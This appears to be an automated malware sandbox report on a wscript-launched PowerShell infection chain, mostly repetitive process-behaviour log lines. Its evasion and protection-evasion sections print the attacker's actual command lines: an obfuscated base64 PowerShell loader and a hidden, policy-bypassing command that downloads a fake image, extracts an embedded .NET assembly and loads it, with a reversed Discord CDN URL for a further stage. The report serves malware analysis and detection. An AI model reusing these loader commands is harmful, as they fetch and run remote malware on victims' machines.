          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1263Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1716Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4467Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5351Jump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 2120Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep count: 4467 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep count: 5351 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: wscript.exe, 00000001.00000003.1422521039.000001FA64A50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424739514.000001FA64A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
          Source: Yara matchFile source: amsi64_1988.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 